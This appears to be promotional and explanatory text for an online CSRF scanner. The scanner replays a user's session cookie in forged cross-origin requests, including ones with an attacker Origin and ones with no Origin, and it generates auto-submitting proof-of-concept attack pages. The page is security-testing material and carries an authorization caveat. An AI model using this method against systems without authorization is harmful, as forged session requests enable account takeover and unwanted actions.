Not a header checker. A genuine 4-phase CSRF engine that fires real cross-origin forged requests with your session, compares server responses, and generates a working PoC attack page.
Four genuine HTTP phases. Session replay. Response comparison. PoC generator.
Fires four distinct HTTP requests — baseline, no-cred probe, forged+session, no-Origin bypass — and compares actual server responses.
Paste your session cookie string directly. Phase 3 sends it with a forged cross-origin Origin header — exactly how a real CSRF attack works.
Compares HTTP status codes and response body lengths between baseline and forged requests. Same response = server didn't check origin = CSRF.
Generates a real HTML CSRF proof-of-concept page with auto-submit. Download and open in a browser while logged into the target to validate exploitability.
Detects 8 token patterns (Laravel, Django, Rails, Angular, ASP.NET…) and flags when they exist — reminding you to also verify server-side validation.
Parses every Set-Cookie attribute (SameSite, Secure, HttpOnly) and audits all security headers with per-item pass/warn/fail ratings.
Paste the endpoint and your session cookie from DevTools → Application → Cookies.
Tool fires a legitimate same-origin request with your session to record what a valid server response looks like.
Sends the identical request with your session but from evil-csrf-attacker.com as Origin and Referer — the real CSRF scenario.
If the server returns the same 2xx response to both, CSRF protection is missing. Different codes = protected.
Cross-Site Request Forgery (CSRF) exploits the browser's implicit trust model: when a user visits an attacker-controlled page, the browser will automatically include session cookies in any request to the target domain — even if that request was triggered by the attacker's JavaScript or a hidden HTML form. The server, seeing a request with a valid session cookie, may process it as legitimate without realizing it was forged from a third-party origin.
Most so-called CSRF scanners online are actually just security header auditors. They check whether headers like X-Frame-Options or SameSite are present — useful information, but not a real CSRF test. A genuine CSRF vulnerability check requires firing an actual forged cross-origin HTTP request that carries the victim's session credentials, then observing whether the server accepts or rejects it.
This tool implements a 4-phase real CSRF test. Phase 1 fires a baseline request with a legitimate Origin header and your session cookie — establishing what a valid server response looks like. Phase 3 is the key test: it sends the identical request body and session cookie but with Origin: https://evil-csrf-attacker.com and Referer: https://evil-csrf-attacker.com/attack.html. If the server returns an equivalent 200 response to both, it has no CSRF protection. If it returns 403, 401, or redirects — it validated the origin.
Phase 4 sends a request with no Origin header at all. This catches a common defense gap: some applications check if Origin === own domain → allow; if Origin === other domain → block but forget the case where Origin is entirely absent — which is how many automated tools and older browsers behave, and which attackers can exploit.
The tool also generates a real CSRF PoC HTML page that auto-submits a forged form when opened in a browser. This is the standard way penetration testers demonstrate exploitability to clients — not a theoretical finding, but a working proof of concept. Use it only on systems you own or have explicit written authorization to test. Combine this CSRF scanner with XSS testing, CORS analysis, and session management review for a complete web application security assessment.
SQL injection testing, encryption, CORS analysis, pen testing and more — all free, no sign-up.